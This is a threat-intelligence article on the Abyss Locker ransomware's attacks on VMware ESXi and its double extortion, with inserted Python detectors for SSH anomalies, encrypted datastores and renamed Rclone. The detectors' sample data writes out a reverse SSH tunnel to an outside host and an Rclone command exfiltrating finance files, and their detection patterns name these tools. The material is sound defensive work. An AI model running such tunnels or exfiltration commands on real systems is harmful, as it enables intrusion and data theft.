The Abyss Locker ransomware, a relatively new but highly disruptive cyber threat, has been actively targeting critical network devices, including VMware ESXi servers, since its emergence in 2023.
This ransomware group employs sophisticated tactics to infiltrate corporate networks, exfiltrate sensitive data, and encrypt systems for financial extortion.
Its focus on virtualized environments has made it a significant concern for enterprises relying on VMware ESXi for hosting virtual machines.
Sophisticated Attack Flow
Abyss Locker’s attack flow begins with exploiting vulnerabilities in edge devices, such as unpatched VPN appliances.
For instance, known flaws like CVE-2021-20038 in SonicWall VPNs have been leveraged to gain initial access.
Once inside the network, the attackers deploy tunneling tools and malware on critical devices to maintain persistence and evade detection.
Key targets include network-attached storage (NAS) systems and VMware ESXi servers.
On ESXi servers, the ransomware exploits administrative credentials or known vulnerabilities to enable SSH access if disabled.
Using the native SSH binary, attackers establish reverse SSH tunnels to their command-and-control (C2) servers.
This allows them to pivot within the network and conduct reconnaissance while avoiding detection.
The resilience of ESXi appliances makes them ideal for maintaining semi-persistent backdoors.
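The SSH-based behaviour described above (the service being switched on, logins from unexpected sources, and a reverse tunnel launched from the host) is what the monitoring advice later in this article asks defenders to catch. The script below is an added example, not code from the article or from Sygnia; it runs three simple checks over constructed log lines that are shaped like ESXi `shell.log`, `auth.log` and a process listing, and the allow-list of management hosts is an assumption for the demo.

```python
"""Flag SSH activity on an ESXi host that matches the tradecraft described
above: the SSH service being switched on, logins from hosts that are not the
usual jump boxes, and a reverse tunnel ("ssh -R") launched from the host.

Added example, not code from the article or from Sygnia. The log lines and
the process listing are constructed to resemble ESXi shell.log, auth.log and
`ps` output; the allow-list of management hosts is an assumption.
"""
import re
from dataclasses import dataclass

# Assumption: the only hosts that should ever open SSH sessions to ESXi.
ALLOWED_SSH_SOURCES = {"10.10.5.20", "10.10.5.21"}

# Constructed sample input (not real logs).
SAMPLE_SHELL_LOG = """\
2024-03-02T01:12:07Z shell[2101]: [root]: vim-cmd hostsvc/enable_ssh
2024-03-02T01:12:31Z shell[2101]: [root]: /etc/init.d/SSH start
2024-03-02T01:14:02Z shell[2101]: [root]: esxcli vm process list
2024-03-02T09:30:00Z shell[3300]: [root]: esxcli storage filesystem list
"""
SAMPLE_AUTH_LOG = """\
2024-03-02T01:15:44Z sshd[2210]: Accepted password for root from 198.51.100.77 port 51022 ssh2
2024-03-02T08:00:10Z sshd[2890]: Accepted publickey for root from 10.10.5.20 port 40010 ssh2
"""
SAMPLE_PROCESSES = [
    "ssh -f -N -R 2222:localhost:22 -p 443 ops@198.51.100.77",
    "hostd ++min=0,swapscope=system",
    "ssh -i /tmp/k backup@10.10.5.21",   # outbound ssh without -R: not a reverse tunnel
]

SSH_ENABLE_RE = re.compile(r"vim-cmd hostsvc/enable_ssh|/etc/init\.d/SSH start")
SSH_ACCEPT_RE = re.compile(r"sshd\[\d+\]: Accepted \S+ for (\S+) from (\S+) port \d+")
REVERSE_TUNNEL_RE = re.compile(r"\bssh\b.*\s-R\s*\d+:")   # ssh ... -R <port>:host:port


@dataclass
class Finding:
    severity: str
    category: str
    detail: str


def scan_shell_log(text):
    """Commands that turn on the SSH service on the host."""
    return [Finding("medium", "ssh_service_enabled", line)
            for line in text.splitlines() if SSH_ENABLE_RE.search(line)]


def scan_auth_log(text, allowed=ALLOWED_SSH_SOURCES):
    """Accepted SSH logins whose source is outside the allow-list."""
    findings = []
    for line in text.splitlines():
        m = SSH_ACCEPT_RE.search(line)
        if m and m.group(2) not in allowed:
            findings.append(Finding("high", "ssh_login_unexpected_source",
                                    f"user={m.group(1)} src={m.group(2)}"))
    return findings


def scan_processes(cmdlines):
    """Outbound ssh processes carrying -R (remote port forward): a reverse
    tunnel out of a hypervisor is almost never legitimate."""
    return [Finding("high", "reverse_ssh_tunnel", c)
            for c in cmdlines if REVERSE_TUNNEL_RE.search(c)]


def analyse(shell_log, auth_log, processes, allowed=ALLOWED_SSH_SOURCES):
    """Run all three checks and return findings ordered high -> medium."""
    found = (scan_shell_log(shell_log) + scan_auth_log(auth_log, allowed)
             + scan_processes(processes))
    return sorted(found, key=lambda f: 0 if f.severity == "high" else 1)


if __name__ == "__main__":
    for f in analyse(SAMPLE_SHELL_LOG, SAMPLE_AUTH_LOG, SAMPLE_PROCESSES):
        print(f"[{f.severity}] {f.category}: {f.detail}")
```

On a real host the same checks can be fed from `/var/log/shell.log`, `/var/log/auth.log` and `ps -c` output shipped to a SIEM; the point is that a hypervisor that suddenly enables SSH, accepts a password login from outside the management range, and then starts its own `ssh -R` process is exhibiting the full sequence this article describes, and each step is visible in logs ESXi already writes.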
The ransomware also employs a Linux ELF encryptor tailored for VMware ESXi systems.
This encryptor uses the `esxcli` command-line tool to list and terminate virtual machines before encrypting associated files such as virtual disks (`.vmdk`), snapshots (`.vmsn`), and metadata (`.vmsd`).
Encrypted files are appended with a `.crypt` extension, and ransom notes are left under filenames like `README_TO_RESTORE`.
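The file-level artefacts just described (the `.crypt` suffix on VM disks, snapshots and metadata, and the `README_TO_RESTORE` note) give an incident responder a quick way to triage a datastore after the fact. The script below is an added example, not code from the article or from Sygnia; it walks a datastore tree and reports which VM folders carry those artefacts. The sample datastore it builds is constructed for the demo, and the assumption that encrypted files keep their original name with `.crypt` appended (e.g. `disk.vmdk.crypt`) is mine, not something the article states.

```python
"""Triage a VMFS datastore tree for artefacts of the ESXi encryptor described
above: '.crypt'-suffixed VM files, ransom notes named README_TO_RESTORE*, and
a count of disk/snapshot/metadata files that are still intact in each folder.

Added example, not code from the article or from Sygnia. The sample datastore
is constructed; for a real investigation point triage_datastore() at a
read-only copy of /vmfs/volumes/<datastore>.
"""
import os
import tempfile

TARGET_EXTS = {".vmdk", ".vmsn", ".vmsd"}   # file types named in the article
CRYPT_EXT = ".crypt"
NOTE_PREFIX = "README_TO_RESTORE"


def triage_datastore(root):
    """Return {vm_folder: {"encrypted": n, "intact": n, "notes": [...]}} for
    every folder under root that shows any sign of the encryptor."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        stats = {"encrypted": 0, "intact": 0, "notes": []}
        for name in files:
            base, ext = os.path.splitext(name)
            if ext == CRYPT_EXT:
                # Assumption: 'db02.vmdk.crypt' was 'db02.vmdk' before encryption.
                if os.path.splitext(base)[1] in TARGET_EXTS:
                    stats["encrypted"] += 1
            elif ext in TARGET_EXTS:
                stats["intact"] += 1
            if name.startswith(NOTE_PREFIX):
                stats["notes"].append(name)
        if stats["encrypted"] or stats["notes"]:
            report[os.path.relpath(dirpath, root)] = stats
    return report


def build_sample_datastore():
    """Create a constructed datastore: one healthy VM folder and one that the
    encryptor has processed. Returns the temporary root directory."""
    root = tempfile.mkdtemp(prefix="datastore1-")
    healthy = os.path.join(root, "web01")
    os.makedirs(healthy)
    for n in ("web01.vmdk", "web01-flat.vmdk", "web01.vmsd", "web01.vmx"):
        open(os.path.join(healthy, n), "wb").close()
    hit = os.path.join(root, "db02")
    os.makedirs(hit)
    for n in ("db02.vmdk.crypt", "db02-flat.vmdk.crypt",
              "db02-Snapshot1.vmsn.crypt", "db02.vmsd.crypt",
              "db02.vmx", "README_TO_RESTORE"):
        open(os.path.join(hit, n), "wb").close()
    return root


if __name__ == "__main__":
    for folder, stats in triage_datastore(build_sample_datastore()).items():
        print(f"{folder}: {stats['encrypted']} encrypted, "
              f"{stats['intact']} intact, notes={stats['notes']}")
```

The same walk, run on a schedule against live datastores and alerting when `encrypted` becomes non-zero or a note appears, is a cheap detection for the "rapid file changes" the mitigation section asks for, and because the encryptor kills running VMs first, a sudden drop in powered-on VMs alongside these artefacts is a strong corroborating signal.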
Double Extortion and Data Exfiltration
Abyss Locker follows a double-extortion model, where stolen data is used as leverage to pressure victims into paying ransoms.
Threat actors have reportedly exfiltrated data volumes ranging from 35 GB to 700 GB per victim.
The stolen data is listed on their Tor-based leak site, “Abyss-data,” threatening public exposure if demands are unmet.
For data exfiltration, the group uses tools like `Rclone`, renamed to evade detection (e.g., `ltsvc.exe`).
![Abyss Locker Ransomware](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgd1NbSxNlms_Hmote61S36zdZeMN6D9_Ac8ieul3J36vXjccwrs8unakj_xq6MO66iJfYaXTbl8mes5BaiySZr0ifRY92KNbvqJCBlji1juizqdumzgzVRTlH9SsPx6YpSJnjeVzXRgUisCDdv_pqbeE-wsu11lgomAoNka7nLbO26Sye4Y00ddEOQatw/s16000/help%20documentation%20for%20%E2%80%98ltsvc.exe%E2%80%99%20showing%20identical%20content%20to%20that%20of%20RClone.webp)
These tools selectively target specific file types for transfer to cloud storage services such as AWS or BackBlaze.
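Renaming the binary defeats a detection that keys on the name `rclone.exe`, but it does not change how Rclone is invoked: a verb such as `copy` or `sync`, a `remote:path` target and Rclone-specific flags still appear on the command line. The script below is an added example, not code from the article or from Sygnia; it scores process-creation records on that grammar instead of the image name. The records are constructed to resemble process-creation telemetry, and the field names, remote names and paths are assumptions for the demo.

```python
"""Spot Rclone that has been renamed (the article cites 'ltsvc.exe') by
matching its command-line grammar rather than the executable name.

Added example, not code from the article or from Sygnia. The events below are
constructed to look like process-creation telemetry; field names, remote
names and file paths are assumptions.
"""
import re

RCLONE_VERBS = {"copy", "sync", "move", "copyto", "moveto", "lsd", "ls",
                "lsf", "config", "mount", "cat"}
# Flag prefixes characteristic of rclone invocations.
RCLONE_FLAGS = ("--config", "--transfers", "--checkers", "--include",
                "--exclude", "--bwlimit", "--max-age", "--min-size",
                "--progress", "--no-check-certificate", "--s3-", "--b2-")
# 'remote:path' or bare 'remote:' but not 'C:\...', 'C:/...' or 'http://'.
REMOTE_RE = re.compile(r"^[A-Za-z0-9_-]+:(?:[^\\/]|$)")
KNOWN_RCLONE_NAMES = {"rclone", "rclone.exe"}

# Constructed sample telemetry (not real events).
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\Temp\ltsvc.exe",
     "command_line": r"ltsvc.exe copy D:\Finance aws:exfil-bucket/finance "
                     r"--transfers 16 --include *.xlsx --no-check-certificate"},
    {"image": r"C:\Windows\System32\robocopy.exe",
     "command_line": r"robocopy.exe D:\Finance E:\Backup /MIR"},
    {"image": r"C:\Tools\rclone.exe",
     "command_line": r"rclone.exe sync C:\Data backup:daily --config C:\Tools\rclone.conf"},
    {"image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe /c dir"},
]


def looks_like_rclone(command_line):
    """Return (score, reasons). Each of verb, remote-style target and
    rclone flags adds one point; a score of 2 or more is treated as a hit."""
    tokens = command_line.split()
    if len(tokens) < 2:
        return 0, []
    args = tokens[1:]
    reasons = []
    if args[0] in RCLONE_VERBS:
        reasons.append(f"verb:{args[0]}")
    if any(REMOTE_RE.match(t) for t in args):
        reasons.append("remote-style target")
    flags = [t for t in args if t.startswith("-") and t.startswith(RCLONE_FLAGS)]
    if flags:
        reasons.append("flags:" + ",".join(flags))
    return len(reasons), reasons


def scan_events(events, threshold=2):
    """Return one finding per event whose command line scores >= threshold,
    marking whether the image name hides the tool ('renamed')."""
    findings = []
    for ev in events:
        score, reasons = looks_like_rclone(ev["command_line"])
        if score >= threshold:
            basename = re.split(r"[\\/]", ev["image"])[-1].lower()
            findings.append({"image": ev["image"], "score": score,
                             "renamed": basename not in KNOWN_RCLONE_NAMES,
                             "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        tag = "RENAMED rclone" if f["renamed"] else "rclone"
        print(f"{tag} score={f['score']} image={f['image']} {f['reasons']}")
```

Because the match is on syntax rather than name, the same rule catches the `ltsvc.exe` case in the article and any future rename, while a sanctioned `rclone.exe` used for backups still shows up (unrenamed) so it can be allow-listed by path or signer rather than silently ignored.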
To bypass security measures, Abyss Locker disables endpoint protection tools like Windows Defender and removes EDR agents using techniques such as Bring Your Own Vulnerable Driver (BYOVD).
Organizations can mitigate the risk of Abyss Locker attacks by implementing robust security measures:
- Patch Management: Regularly update VPN appliances and other edge devices to address known vulnerabilities.
- Network Segmentation: Isolate critical infrastructure into separate VLANs with strict firewall rules.
- Endpoint Protection: Enable tamper protection for EDR solutions and restrict installation of unsigned drivers.
- Backup Security: Use immutable storage solutions and isolate backups from production networks.
Monitoring tools should be configured to detect anomalies in SSH activity, unauthorized access attempts on ESXi servers, and rapid file changes indicative of ransomware behavior.
According to the Sygnia report, the Abyss Locker ransomware exemplifies the growing sophistication of cyberattacks targeting virtualized environments.
Its focus on VMware ESXi servers underscores the need for enterprises to adopt proactive defense strategies and enhance monitoring capabilities to safeguard their critical infrastructure from such evolving threats.